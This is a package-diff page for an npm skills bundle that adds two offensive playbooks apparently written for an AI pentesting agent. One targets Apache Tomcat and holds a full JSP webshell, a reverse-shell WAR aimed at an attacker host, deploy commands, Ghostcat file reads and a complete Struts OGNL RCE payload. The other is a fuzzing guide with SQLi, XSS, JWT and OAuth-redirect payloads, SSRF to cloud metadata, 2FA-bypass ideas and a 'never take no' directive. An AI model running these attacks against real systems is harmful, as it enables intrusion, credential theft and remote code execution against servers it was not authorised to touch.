npm - @aegis-scan/skills - Versions diffs - 0.5.0 → 0.5.2 - Mend

@aegis-scan/skills 0.5.0 → 0.5.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (345) hide show

package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md ADDED Viewed

@@ -0,0 +1,232 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: tomcat
+description: Security testing playbook for Apache Tomcat covering manager app RCE, AJP Ghostcat, default credentials, WAR file deployment, and Tomcat-specific misconfigurations
+---
+# Apache Tomcat Security Testing
+Tomcat is the most common Java servlet container. Critical attack surface: manager app with default credentials enabling WAR file upload (instant RCE), AJP Ghostcat (CVE-2020-1938) for file read, and host-manager misconfigurations.
+---
+## Reconnaissance
+### Discovery
+    # Port scanning
+    nmap -p 8080,8443,8009,8005 <target> -sV --open
+    # Ports:
+    # 8080  — Tomcat HTTP
+    # 8443  — Tomcat HTTPS
+    # 8009  — AJP connector (Ghostcat target)
+    # 8005  — Shutdown port (bind to 127.0.0.1 normally)
+    # Tomcat fingerprinting:
+    GET /                       # Default page or deployed app
+    GET /index.jsp              # JSP extension = Java servlet container
+    GET /examples/              # Tomcat example apps (reveals version)
+    GET /docs/                  # Tomcat docs (version in title)
+    # Error page shows Tomcat version: "Apache Tomcat/9.0.65"
+---
+## Manager Application
+The Tomcat Manager deploys/undeploys WARs and provides server status:
+    # Manager app paths
+    GET /manager/html               # Web-based Manager GUI
+    GET /manager/text               # Text-based Manager API
+    GET /manager/status             # Server status (JVM, threads, requests)
+    GET /host-manager/html          # Virtual host manager
+    # Default credentials (try all):
+    tomcat:tomcat
+    admin:admin
+    admin:password
+    admin:
+    tomcat:s3cret
+    both:tomcat
+    role1:tomcat
+    manager:manager
+    root:root
+    # Brute force Manager:
+    hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
+      -P /usr/share/wordlists/rockyou.txt \
+      <target> http-get /manager/html
+    # curl with basic auth:
+    curl -u tomcat:tomcat http://<target>:8080/manager/html
+---
+## WAR File Upload → RCE
+If Manager credentials found, deploy malicious WAR for webshell:
+    # Method 1: msfvenom WAR payload
+    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f war -o shell.war
+    # Method 2: Manual JSP webshell in WAR
+    mkdir -p /tmp/webshell/WEB-INF
+    cat > /tmp/webshell/cmd.jsp << 'EOF'
+    <%@ page import="java.io.*" %>
+    <%
+    String cmd = request.getParameter("cmd");
+    if (cmd != null) {
+        Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c",cmd});
+        InputStream in = p.getInputStream();
+        int c;
+        while ((c = in.read()) != -1) out.print((char)c);
+        p.waitFor();
+    }
+    %>
+    EOF
+    cat > /tmp/webshell/WEB-INF/web.xml << 'EOF'
+    <?xml version="1.0" encoding="UTF-8"?>
+    <web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
+    </web-app>
+    EOF
+    cd /tmp/webshell && jar -cvf shell.war .
+    # Deploy WAR via Manager API:
+    curl -u tomcat:tomcat \
+      "http://<target>:8080/manager/text/deploy?path=/shell&update=true" \
+      --upload-file shell.war
+    # Trigger webshell:
+    curl "http://<target>:8080/shell/cmd.jsp?cmd=id"
+    # Undeploy (cleanup):
+    curl -u tomcat:tomcat "http://<target>:8080/manager/text/undeploy?path=/shell"
+    # Metasploit:
+    use exploit/multi/http/tomcat_mgr_upload
+    set RHOSTS <target>
+    set RPORT 8080
+    set HttpUsername tomcat
+    set HttpPassword tomcat
+    run
+---
+## AJP Ghostcat (CVE-2020-1938)
+AJP port 8009 allows reading arbitrary files from the Tomcat webapp (no auth):
+    # Check if AJP is exposed:
+    nmap -p 8009 <target>
+    # Ghostcat — read arbitrary files from webapp:
+    # Tool: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
+    python3 ajpShooter.py http://<target> 8009 /WEB-INF/web.xml read
+    python3 ajpShooter.py http://<target> 8009 /WEB-INF/classes/application.properties read
+    # Read sensitive files via AJP:
+    python3 ajpShooter.py http://<target> 8009 /META-INF/context.xml read    # DB creds
+    python3 ajpShooter.py http://<target> 8009 /WEB-INF/spring/root-context.xml read
+    # If JSP file upload exists → RCE via AJP:
+    # 1. Upload a JSP file (any file upload endpoint)
+    # 2. Include uploaded file via AJP: ajpShooter.py ... /uploads/shell.jpg exec
+    # Nuclei:
+    nuclei -t cves/2020/CVE-2020-1938.yaml -u http://<target>:8009/
+---
+## Tomcat Configuration Files
+    # If Manager access exists, read config files:
+    # tomcat-users.xml — all credentials:
+    GET /manager/text/serverinfo                 # JVM + OS info
+    # File location: $CATALINA_HOME/conf/tomcat-users.xml
+    # Via LFI or file read primitives:
+    /etc/tomcat9/tomcat-users.xml
+    /usr/share/tomcat9/conf/tomcat-users.xml
+    /opt/tomcat/conf/tomcat-users.xml
+    $CATALINA_HOME/conf/server.xml              # AJP config, ports, connectors
+    $CATALINA_HOME/conf/web.xml                 # Default servlet config
+    # Key fields in server.xml:
+    <Connector port="8009" protocol="AJP/1.3" ... />   # AJP connector
+    # If requiredSecret not set = vulnerable to Ghostcat
+---
+## Default Web Applications
+Tomcat ships with example applications — always check:
+    GET /examples/                  # Servlet and JSP examples
+    GET /examples/servlets/         # Servlet demos
+    GET /examples/jsp/              # JSP demos (may have file read)
+    GET /examples/jsp/snp/snoop.jsp # HTTP request info (headers, session)
+    GET /examples/jsp/source.jsp    # JSP source code viewer
+    GET /host-manager/              # Virtual host manager
+    GET /ROOT/                      # Default ROOT webapp
+---
+## CVE Exploitation
+| CVE | Tomcat Version | Impact |
+|-----|---------------|--------|
+| CVE-2020-1938 | < 9.0.31, < 8.5.51, < 7.0.100 | AJP file read / RCE (Ghostcat) |
+| CVE-2017-12617 | < 9.0.1, < 8.5.23, < 8.0.47, < 7.0.82 | JSP upload via PUT + RCE |
+| CVE-2019-0232 | Windows, CGI servlet | RCE via CGI arguments |
+| CVE-2016-4438 | Struts 2 (on Tomcat) | RCE via OGNL injection |
+| CVE-2014-0094 | Struts 2 | ClassLoader manipulation |
+    # CVE-2017-12617 — JSP upload via HTTP PUT:
+    curl -X PUT "http://<target>:8080/shell.jsp/" \
+      -d "<%Runtime.getRuntime().exec(new String[]{\"sh\",\"-c\",\"id\"});%>"
+    # Note trailing slash — bypasses restriction
+    # Access webshell:
+    GET /shell.jsp
+    # Nuclei:
+    nuclei -t cves/ -tags tomcat -u http://<target>:8080/
+---
+## Struts 2 (Commonly Deployed on Tomcat)
+Apache Struts is a Java MVC framework frequently deployed on Tomcat:
+    # Struts 2 fingerprinting:
+    GET /*.action                   # Action extension
+    GET /*.do                       # Alternative extension
+    # Error pages may show Struts version
+    # OGNL injection (Struts 2 RCE):
+    # CVE-2017-5638 (S2-045) — Content-Type header:
+    curl -X POST http://<target>/example/Login.action \
+      -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
+    # Automated Struts2 scanner:
+    python3 struts-pwn.py --url http://<target>/*.action --cmd id
+---
+## Pro Tips
+1. Try ALL default credential combinations — `tomcat:s3cret` and `admin:admin` are most common
+2. AJP port 8009 often not firewalled internally — Ghostcat is zero-credential file read
+3. CVE-2017-12617 (PUT JSP upload) is still common on unpatched Tomcat < 8.5.23
+4. `/examples/` apps should never be in production — check for source.jsp file reader
+5. Struts 2 on Tomcat is an extremely high-value target — OGNL injection = RCE
+6. `tomcat-users.xml` contains plaintext passwords — read via Ghostcat or LFI
+7. WAR deployment via Manager with minimal permissions (deploy role only) is common
+## Summary
+Tomcat testing = Manager app with default creds → WAR upload RCE + AJP port 8009 Ghostcat file read + CVE-2017-12617 PUT JSP upload. Manager app + `tomcat:tomcat` = instant RCE via WAR deploy in 30 seconds. AJP Ghostcat is zero-credential arbitrary file read — read `tomcat-users.xml`, `web.xml`, and database config files. Always check for Struts 2 if `.action` or `.do` extensions appear — OGNL injection is still one of the most impactful Java RCEs.

package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md ADDED Viewed

@@ -0,0 +1,351 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+# Advanced Fuzzing & Expert Testing Guide
+## Built-in Python Fuzzing Tools (Use These First)
+AIRecon has three built-in fuzzing tools that run directly inside the agent — no shell needed:
+| Tool | When to Use | Speed |
+|---|---|---|
+| `quick_fuzz` | First pass on any URL — auto-discovers params, tests SQLi/XSS/SSTI/Path Traversal | Fast |
+| `advanced_fuzz` | When you know specific params and vuln types to test | Medium |
+| `deep_fuzz` | After quick/advanced finds hints — discovers multi-step exploit chains (SQLi→RCE, XSS→Cookie Steal) | Slow but thorough |
+| `generate_wordlist` | Before ffuf — saves targeted exploit payload wordlist (SQLi/XSS/SSTI/SSRF/etc.) to `output/` | Instant |
+### Decision Flow
+```
+New endpoint discovered?
+    ↓
+1. quick_fuzz(target=url)          ← always start here, no setup needed
+    ↓
+   Got findings? → deep_fuzz(target=url)   ← deeper chain analysis
+   No findings?  → advanced_fuzz(target=url, parameters=[...], vuln_types=[...])
+    ↓
+2. generate_wordlist(output_file="sqli.txt", vuln_types=["sql_injection","xss"])
+   → ffuf -u "url?param=FUZZ" -w output/sqli.txt -mc 200,302,500
+```
+### Examples
+```
+# Quick scan — no param knowledge needed
+quick_fuzz(target="https://target.com/search?q=test")
+# Deep chain discovery after finding XSS hint
+deep_fuzz(target="https://target.com/api/comment", params=["body","title"])
+# Generate targeted SQLi+XSS payload wordlist then use with ffuf
+generate_wordlist(output_file="web_payloads.txt", vuln_types=["sql_injection","xss","ssti"])
+execute: ffuf -u "https://target.com/api?q=FUZZ" -w /workspace/target/output/web_payloads.txt -mc 200,500
+# Generate all payloads (no filter) for broad coverage
+generate_wordlist(output_file="all_payloads.txt")
+execute: ffuf -u "https://target.com/search?q=FUZZ" -w /workspace/target/output/all_payloads.txt -mr "error|warning|exception"
+```
+### Available vuln_types for generate_wordlist
+```
+sql_injection, xss, command_injection, path_traversal, ssti,
+xxe, ssrf, idor, mass_assignment, parameter_pollution,
+jwt, graphql, race_condition
+```
+## Zero-Day Discovery Strategy
+### 1. Intelligent Fuzzing
+When standard tools fail, use intelligent fuzzing:
+CRITICAL ffuf flag note: ffuf uses -rate (NOT -rl). -rl does NOT exist in ffuf.
+  Wrong: ffuf ... -rl 100    ← "flag provided but not defined: -rl"
+  Correct: ffuf ... -rate 100
+Also: ALWAYS add -noninteractive for agent use (prevents interactive console hanging).
+```
+# Fuzz parameters with mutations
+ffuf -u "https://target.com/api?PARAM=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mr "error|exception|warning" -t 30 -rate 50 -noninteractive
+# Fuzz with payloads
+ffuf -u "https://target.com/search?q=FUZZ" -w xss_payloads.txt -fc 400,404 -t 30 -rate 50 -noninteractive
+# Fuzz HTTP methods
+for method in GET POST PUT DELETE PATCH; do curl -X $method "https://target.com/api"; done
+# Fuzz headers
+ffuf -u "https://target.com/" -H "FUZZ: test" -w /usr/share/seclists/Discovery/Web-Content/burp-http-headers.txt -t 20 -rate 30 -noninteractive
+```
+### 2. Parameter Pollution Testing
+Test for HPP (HTTP Parameter Pollution):
+```
+?id=1&id=2
+?id=1&id=1
+?id=1|id=2
+?id=1%26id=2
+```
+### 3. Mass Assignment Testing
+Try adding extra parameters:
+```
+# Add admin parameters
+POST /user/update
+user[name]=test&role=admin
+user[name]=test&is_admin=1
+user[name]=test&privileges[]=admin
+# Add price manipulation
+POST /checkout
+price=100&discount=999
+price=-100
+amount=0.01
+```
+### 4. Bypass Techniques
+#### WAF Bypass
+```
+# Case variation
+<ScRiPt>alert(1)</sCrIpT>
+# Encoding
+%3Cscript%3Ealert(1)%3C/script%3E
+# Polygot
+javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
+```
+#### Auth Bypass
+```
+# SQLi in login
+admin' OR '1'='1
+' OR 1=1--
+" OR "1"="1
+# JWT bypass
+{"alg":"none","typ":"JWT"}
+{"alg":"HS256","typ":"JWT","kid":"../../../../../etc/passwd"}
+# OAuth redirect
+https://target.com/oauth?redirect_uri=https://attacker.com
+https://target.com/oauth?redirect_uri=https://target.com.attacker.com
+```
+### 5. Race Condition Testing
+Use Burp Repeater or turbo-intruder:
+```
+# Send same request 10 times simultaneously
+# Test: gift card balance, password reset, coupon reuse
+```
+## Expert Intuition Patterns
+### High-Probability Vulnerability Locations
+Based on experience, these are MOST LIKELY to be vulnerable:
+1. **Authentication Endpoints**
+   - `/login`, `/signin`, `/auth`
+   - `/forgot-password`, `/reset-password`
+   - `/register`, `/signup`
+2. **API Endpoints**
+   - `/api/v1/*`
+   - `/api/admin/*`
+   - `/api/user/*`
+3. **ID Parameters**
+   - Any parameter named `id`, `user_id`, `order_id`
+   - Often vulnerable to IDOR
+4. **Search/Filter**
+   - `/search`, `/query`, `/find`
+   - Often XSS or SQLi
+5. **File Operations**
+   - `/upload`, `/download`, `/view`
+   - Often LFI, RCE, SSRF
+6. **Redirects**
+   - `redirect`, `callback`, `return`, `next`
+   - Often open redirect or SSRF
+### Expert Testing Order
+Don't test randomly! Follow this ORDER:
+```
+1. IDOR (easiest to find)
+   - Change IDs in: profile, orders, documents
+2. XSS (high impact)
+   - Search, comment, profile fields
+3. SQLi (critical)
+   - Login, search, filters
+4. Auth bypass
+   - JWT, OAuth, session
+5. Business logic (highest impact)
+   - Price manipulation
+   - Race conditions
+```
+## Real-Time Response Analysis
+### What to Look For
+```
+# Error messages (SQLi, RCE)
+"SQL syntax", "mysql_fetch", "ORA-", "unterminated"
+"Parse error", "undefined", "fatal error"
+# Information disclosure
+"Warning:", "Notice:", "Stack trace:"
+"/etc/passwd", "c:\windows"
+# Behavior changes
+- Different status code
+- Different content length
+- Different response time
+- New cookies set
+- New redirects
+```
+### Immediate Actions on Anomaly
+```
+IF error in response → Try escalation (SQLi, RCE)
+IF redirect → Test open redirect, SSRF
+IF timeout → Test DoS, slow Loris
+IF longer response → Test for data disclosure
+IF cookies set → Test for authentication issues
+```
+## Creative Exploit Chaining
+### Known Chains
+1. **SSRF → AWS Metadata**
+   ```
+   SSRF (port 80/443) → AWS metadata (169.254.169.254) → Credentials → Full AWS compromise
+   ```
+2. **IDOR + Broken Auth**
+   ```
+   IDOR (change user_id) + Session fixation → Account takeover
+   ```
+3. **XSS + CSRF**
+   ```
+   XSS (stored) + CSRF token theft → Account takeover
+   ```
+4. **File Upload + LFI**
+   ```
+   Upload restriction bypass → Webshell → LFI → Database credentials → Full compromise
+   ```
+5. **JWT + SQLi**
+   ```
+   JWT algorithm confusion → Forge token → SQLi in user context → Admin access
+   ```
+## Manual Testing Checklist
+Run through this for EVERY target:
+```
+☐ Test all ID parameters (IDOR)
+☐ Test all input fields (XSS)
+☐ Test all search parameters (XSS, SQLi)
+☐ Test authentication endpoints (SQLi, Auth bypass)
+☐ Test file upload (RCE)
+☐ Test redirects (Open redirect, SSRF)
+☐ Test headers (SSRF, CRLF)
+☐ Test APIs (IDOR, BOLA)
+☐ Test business logic (Price, quantity)
+☐ Test race conditions (Time-based)
+```
+## Response Time Analysis
+Use timing to detect vulnerabilities:
+```
+SQLi (time-based):
+?param=1' AND SLEEP(5)-- (5 second delay = vulnerable)
+Blind XSS:
+?comment=<script>... (check your callback server)
+Race Condition:
+Send 10 requests simultaneously
+Check if balance updated correctly
+```
+## Expert Tips
+1. **Always check source** - View source reveals hidden params, comments, secrets
+2. **Check JavaScript** - API endpoints, hardcoded keys, validation logic
+3. **Check mobile API** - Often less protected than web
+4. **Check staging/backup** - /staging, /test, /backup, /old
+5. **Check subdomains** - Often forgotten, less secured
+6. **Check third-party** - Embedded content, plugins, integrations
+## Creative Techniques
+### Bypass 2FA
+```
+- Response manipulation: {"code":"1234","success":false} → {"code":"1234","success":true}
+- Lack of rate limiting: Request 0000-9999 codes
+- Backup codes: Use instead of 2FA
+- Token reuse: Use old token after disable 2FA
+```
+### Bypass WAF
+```
+- Use HEAD instead of GET
+- HTTP/0.9 (no Host required)
+- Imperial colon: GET /:80/index.html
+- Unicode variation: Ð instead of d
+```
+### Bypass Login
+```
+- Double encoding: %2527 instead of %27
+- Unicode: Ð vs d
+- CRLF injection: /login\r\nX-Rewrite
+```
+## Always Remember
+1. **Test the UNEXPECTED** - Parameters you wouldn't think of
+2. **Chain vulnerabilities** - One finding + another = critical
+3. **Think like developer** - What would I miss?
+4. **Check everything twice** - Burp Scanner finds 30%, you find 70%
+5. **No is never no** - Try harder, try differently
+## Interactive Testing Commands
+When you need to verify manually:
+```bash
+# Test XSS manually
+curl "https://target.com/search?q=<script>alert(1)</script>"
+# Test SQLi manually
+curl "https://target.com/id=1'"
+# Test LFI manually
+curl "https://target.com/file=../../../etc/passwd"
+# Test SSRF manually
+curl "http://target.com/?url=http://169.254.169.254/latest/meta-data"
+```